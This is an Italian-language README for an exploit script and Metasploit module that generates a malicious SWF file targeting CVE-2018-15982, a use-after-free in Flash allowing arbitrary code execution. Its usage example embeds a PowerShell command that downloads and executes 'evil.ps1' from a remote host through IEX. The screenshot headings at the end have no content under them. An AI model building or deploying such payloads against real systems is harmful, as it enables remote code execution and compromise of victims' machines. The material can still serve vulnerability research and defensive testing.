
Script e modulo metasploit per CVE-2018-15982
Questo script crea un payload swf per CVE-2018-15982, basato sul PoC di https://github.com/smgorelik/Windows-RCE-exploits. La vulnerabilità è stata scoperta da Chenming Xu e Ed Miles di Gigamon ATR.
La vulnerabilità è un difetto use-after-free che consente l'esecuzione arbitraria di codice in Flash. Ulteriori informazioni sono disponibili nei link seguenti.
Nota: attualmente viene spruzzato un solo blocco, me ne sono accorto dopo aver creato lo script.
Utilizzo:
python create_swf.py <comando> <nome file di output>
Esempio di utilizzo:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
Testato su:
Creazione del payload:

Esecuzione del payload:

Conferma dell'esecuzione:

